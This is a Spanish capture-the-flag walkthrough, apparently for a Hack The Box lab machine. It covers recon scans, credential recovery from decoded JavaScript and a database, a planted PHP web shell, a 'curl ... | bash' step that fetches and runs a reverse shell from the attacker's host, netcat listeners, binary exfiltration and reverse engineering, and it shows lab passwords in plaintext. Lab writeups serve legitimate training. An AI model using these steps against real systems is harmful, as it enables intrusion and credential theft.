nmap -A -p- -oA bitlab 10.129.189.67 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA bitlab 10.129.189.67

nmap -sU -O -p- -oA bitlab-udp 10.129.189.67

nikto -h 10.129.189.67:80

Pasted image 20211212080547.png

Pasted image 20211212080647.png

whatweb http://10.129.189.67

Pasted image 20211212080829.png

Nos dirigimos a http://10.129.189.67

Pasted image 20211212091422.png

Despues vamos a http://10.129.189.67/robots.txt

Pasted image 20211212091512.png

En la ruta de /help le damos click a bookmarks.html

Pasted image 20211212091900.png

Para GitLab Login vemos lo siguiente:

Pasted image 20211212091956.png

Agarramos el javascript encontrado para el gitlab login y lo tratamos de decodificar.

echo "var ..." | sed "s/&quot/\'/g"

Pasted image 20211212092257.png

Nos dirigimos al login y ponemos las siguientes credenciales: clave:11des0081x

Pasted image 20211212092449.png

En snippets vemos lo siguiente

Pasted image 20211212093055.png

Creamos un archivo y le hacemos un merge

Pasted image 20211212094045.png

Nos dirigimos a http://10.129.189.67/profile/rev_shell.php?cmd=id

Pasted image 20211212094246.png

http://10.129.189.67/profile/rev_shell.php?cmd=curl 10.10.XX.XXX | bash

Pasted image 20211212095216.png

Creamos un archivo index.html con un reverse shell

python3 -m http.server 80

nc -lvnp 443

Pasted image 20211212095238.png

Actualizamos el shell

Pasted image 20211212095435.png

php interacive

$connection = new PDO('pgsql:dbname=profiles;host=localhost',p'profiles','profiles');

$connect = $connection->query('select * from profiles');

$results = $connect->fetchAll();

print_r( $results);

Pasted image 20211212101655.png

credenciales clave:c3NoLXN0cjBuZy1wQHNz==

ssh clave@10.129.189.67

Pasted image 20211212102057.png

base64 -w 0 RemoteConnection.exe ; echo

Pasted image 20211212103056.png

Como no podemos bajar el archivo por wget lo convertimos en base64

base64 -w 0 RemoteConnection.exe; echo

Despues para decodificarlo en base64

echo "AAANA...." | base64 -d > RemoteConnection.exe

Pasted image 20211212104519.png

strings RemoteConnection.exe | grep "\.dll"

Pasted image 20211212105729.png

radare2 RemoteConnection.exe

aaa

afl

Pero aqui no encontre nada

Pasted image 20211212110315.png

Corremos ghidra

./ghidraRun

Pasted image 20211212113928.png

Vemos putty

Pasted image 20211212114209.png

credenciales root:Qf7]8YSV.wDNF*[7d?j&eD4^

Pasted image 20211212125116.png

cat /root/root.txt

Pasted image 20211212130156.png

boxes

copyright©2022 Cu3rv0x all rights reserved